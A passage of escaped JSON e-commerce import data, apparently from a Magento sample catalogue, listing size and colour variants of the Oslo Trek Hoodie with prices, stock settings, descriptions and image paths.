additional_attributes\":\"has_options=0,required_options=0,size=S,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh08-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh08-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Purple\"},\"117\":{\"sku\":\"MH08-S-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Oslo Trek Hoodie-S-Red\",\"description\":\"<p>Chilly weather is just an excuse to throw on your toasty, handsome new Oslo Trek Hoodie. It features an adjustable drawstring hood and a kangaroo pocket for extra hand warmth. The ultra-soft, cozy lining will have you wishing for more brisk days.<\\/p>\\n<p>&bull; Brown hoodie with black detail.<br \\/>&bull; Pullover. <br \\/>&bull; Adjustable drawstring hood. <br \\/>&bull; Ribbed cuffs\\/waistband. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"oslo-trek-hoodie-s-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh08-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh08-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh08-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=S,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh08-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh08-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"S\",\"color\":\"Red\"},\"118\":{\"sku\":\"MH08-M-Brown\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Oslo Trek Hoodie-M-Brown\",\"description\":\"<p>Chilly weather is just an excuse to throw on your toasty, handsome new Oslo Trek Hoodie. It features an adjustable drawstring hood and a kangaroo pocket for extra hand warmth. The ultra-soft, cozy lining will have you wishing for more brisk days.<\\/p>\\n<p>&bull; Brown hoodie with black detail.<br \\/>&bull; Pullover. <br \\/>&bull; Adjustable drawstring hood. <br \\/>&bull; Ribbed cuffs\\/waistband. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"oslo-trek-hoodie-m-brown\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh08-brown_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh08-brown_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh08-brown_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Brown\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh08-brown_alt1.jpg,\\/m\\/h\\/mh08-brown_back.jpg\",\"image\":\"\\/m\\/h\\/mh08-brown_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh08-brown_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh08-brown_alt1.jpg,\\/m\\/h\\/mh08-brown_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Brown\"},\"119\":{\"sku\":\"MH08-M-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Oslo Trek Hoodie-M-Purple\",\"description\":\"<p>Chilly weather is just an excuse to throw on your toasty, handsome new Oslo Trek Hoodie. It features an adjustable drawstring hood and a kangaroo pocket for extra hand warmth. The ultra-soft, cozy lining will have you wishing for more brisk days.<\\/p>\\n<p>&bull; Brown hoodie with black detail.<br \\/>&bull; Pullover. <br \\/>&bull; Adjustable drawstring hood. <br \\/>&bull; Ribbed cuffs\\/waistband. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"oslo-trek-hoodie-m-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh08-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh08-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh08-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh08-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh08-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Purple\"},\"120\":{\"sku\":\"MH08-M-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Oslo Trek Hoodie-M-Red\",\"description\":\"<p>Chilly weather is just an excuse to throw on your toasty, handsome new Oslo Trek Hoodie. It features an adjustable drawstring hood and a kangaroo pocket for extra hand warmth. The ultra-soft, cozy lining will have you wishing for more brisk days.<\\/p>\\n<p>&bull; Brown hoodie with black detail.<br \\/>&bull; Pullover. <br \\/>&bull; Adjustable drawstring hood. <br \\/>&bull; Ribbed cuffs\\/waistband. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"oslo-trek-hoodie-m-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh08-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh08-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh08-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=M,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh08-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh08-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"M\",\"color\":\"Red\"},\"121\":{\"sku\":\"MH08-L-Brown\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Oslo Trek Hoodie-L-Brown\",\"description\":\"<p>Chilly weather is just an excuse to throw on your toasty, handsome new Oslo Trek Hoodie. It features an adjustable drawstring hood and a kangaroo pocket for extra hand warmth. The ultra-soft, cozy lining will have you wishing for more brisk days.<\\/p>\\n<p>&bull; Brown hoodie with black detail.<br \\/>&bull; Pullover. <br \\/>&bull; Adjustable drawstring hood. <br \\/>&bull; Ribbed cuffs\\/waistband. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"oslo-trek-hoodie-l-brown\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh08-brown_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh08-brown_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh08-brown_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Brown\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh08-brown_alt1.jpg,\\/m\\/h\\/mh08-brown_back.jpg\",\"image\":\"\\/m\\/h\\/mh08-brown_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh08-brown_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh08-brown_alt1.jpg,\\/m\\/h\\/mh08-brown_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Brown\"},\"122\":{\"sku\":\"MH08-L-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Oslo Trek Hoodie-L-Purple\",\"description\":\"<p>Chilly weather is just an excuse to throw on your toasty, handsome new Oslo Trek Hoodie. It features an adjustable drawstring hood and a kangaroo pocket for extra hand warmth. The ultra-soft, cozy lining will have you wishing for more brisk days.<\\/p>\\n<p>&bull; Brown hoodie with black detail.<br \\/>&bull; Pullover. <br \\/>&bull; Adjustable drawstring hood. <br \\/>&bull; Ribbed cuffs\\/waistband. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"oslo-trek-hoodie-l-purple\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh08-purple_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh08-purple_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh08-purple_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Purple\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh08-purple_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh08-purple_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Purple\"},\"123\":{\"sku\":\"MH08-L-Red\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Oslo Trek Hoodie-L-Red\",\"description\":\"<p>Chilly weather is just an excuse to throw on your toasty, handsome new Oslo Trek Hoodie. It features an adjustable drawstring hood and a kangaroo pocket for extra hand warmth. The ultra-soft, cozy lining will have you wishing for more brisk days.<\\/p>\\n<p>&bull; Brown hoodie with black detail.<br \\/>&bull; Pullover. <br \\/>&bull; Adjustable drawstring hood. <br \\/>&bull; Ribbed cuffs\\/waistband. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"oslo-trek-hoodie-l-red\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh08-red_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh08-red_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh08-red_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=L,color=Red\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":null,\"image\":\"\\/m\\/h\\/mh08-red_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh08-red_main.jpg\",\"thumbnail_label\":null,\"_media_image\":null,\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"L\",\"color\":\"Red\"},\"124\":{\"sku\":\"MH08-XL-Brown\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Oslo Trek Hoodie-XL-Brown\",\"description\":\"<p>Chilly weather is just an excuse to throw on your toasty, handsome new Oslo Trek Hoodie. It features an adjustable drawstring hood and a kangaroo pocket for extra hand warmth. The ultra-soft, cozy lining will have you wishing for more brisk days.<\\/p>\\n<p>&bull; Brown hoodie with black detail.<br \\/>&bull; Pullover. <br \\/>&bull; Adjustable drawstring hood. <br \\/>&bull; Ribbed cuffs\\/waistband. <br \\/>&bull; Machine wash\\/dry.<\\/p>\",\"short_description\":null,\"weight\":\"1\",\"product_online\":\"1\",\"tax_class_name\":\"Taxable Goods\",\"visibility\":\"Not Visible Individually\",\"price\":\"42\",\"special_price\":null,\"special_price_from_date\":null,\"special_price_to_date\":null,\"url_key\":\"oslo-trek-hoodie-xl-brown\",\"meta_title\":null,\"meta_keywords\":null,\"meta_description\":null,\"base_image\":\"\\/m\\/h\\/mh08-brown_main.jpg\",\"base_image_label\":null,\"small_image\":\"\\/m\\/h\\/mh08-brown_main.jpg\",\"small_image_label\":null,\"thumbnail_image\":\"\\/m\\/h\\/mh08-brown_main.jpg\",\"thumbnail_image_label\":null,\"created_at\":null,\"updated_at\":null,\"new_from_date\":null,\"new_to_date\":null,\"display_product_options_in\":null,\"map_price\":null,\"msrp_price\":null,\"map_enabled\":null,\"gift_message_available\":null,\"custom_design\":null,\"custom_design_from\":null,\"custom_design_to\":null,\"custom_layout_update\":null,\"page_layout\":null,\"product_options_container\":null,\"msrp_display_actual_price_type\":null,\"country_of_manufacture\":null,\"additional_attributes\":\"has_options=0,required_options=0,size=XL,color=Brown\",\"qty\":\"100\",\"out_of_stock_qty\":\"0\",\"use_config_min_qty\":\"1\",\"is_qty_decimal\":\"0\",\"allow_backorders\":\"0\",\"use_config_backorders\":\"1\",\"min_cart_qty\":\"1\",\"use_config_min_sale_qty\":\"1\",\"max_cart_qty\":\"0\",\"use_config_max_sale_qty\":\"1\",\"is_in_stock\":\"1\",\"notify_on_stock_below\":null,\"use_config_notify_stock_qty\":\"1\",\"manage_stock\":\"0\",\"use_config_manage_stock\":\"1\",\"use_config_qty_increments\":\"1\",\"qty_increments\":\"0\",\"use_config_enable_qty_inc\":\"1\",\"enable_qty_increments\":\"0\",\"is_decimal_divided\":\"0\",\"website_id\":\"1\",\"configurable_variations\":null,\"configurable_variation_prices\":null,\"configurable_variation_labels\":null,\"additional_images\":\"\\/m\\/h\\/mh08-brown_alt1.jpg,\\/m\\/h\\/mh08-brown_back.jpg\",\"image\":\"\\/m\\/h\\/mh08-brown_main.jpg\",\"image_label\":null,\"thumbnail\":\"\\/m\\/h\\/mh08-brown_main.jpg\",\"thumbnail_label\":null,\"_media_image\":\"\\/m\\/h\\/mh08-brown_alt1.jpg,\\/m\\/h\\/mh08-brown_back.jpg\",\"_store\":null,\"_attribute_set\":\"Top\",\"_product_websites\":\"base\",\"status\":\"1\",\"news_from_date\":null,\"news_to_date\":null,\"options_container\":null,\"minimal_price\":null,\"msrp\":null,\"msrp_enabled\":null,\"special_from_date\":null,\"special_to_date\":null,\"min_qty\":\"0\",\"backorders\":\"0\",\"min_sale_qty\":\"1\",\"max_sale_qty\":\"0\",\"notify_stock_qty\":null,\"meta_keyword\":null,\"has_options\":\"0\",\"required_options\":\"0\",\"size\":\"XL\",\"color\":\"Brown\"},\"125\":{\"sku\":\"MH08-XL-Purple\",\"store_view_code\":null,\"attribute_set_code\":\"Top\",\"product_type\":\"simple\",\"categories\":\"Default Category\\/Men\\/Tops\\/Hoodies & Sweatshirts\",\"product_websites\":\"base\",\"name\":\"Oslo Trek Hoodie-XL-Purple\",\"description\":\"<p>Chilly weather is just an excuse to throw on your toasty, handsome new Oslo Trek Hoodie. It features an adjustable drawstring hood and a kangaroo pocket for extra hand warmth. The ultra-soft, cozy lining will have you wishing for more brisk days.<\\/p>\\n<p>&bull; Brown hoodie with black detail.<br \\/>&bull; Pullover. <br \\/>&bull; Adjustable drawstring hood. <br \\/>&bull; Ribbed cuffs\\/waistband. <br \\/>&bull; Machine 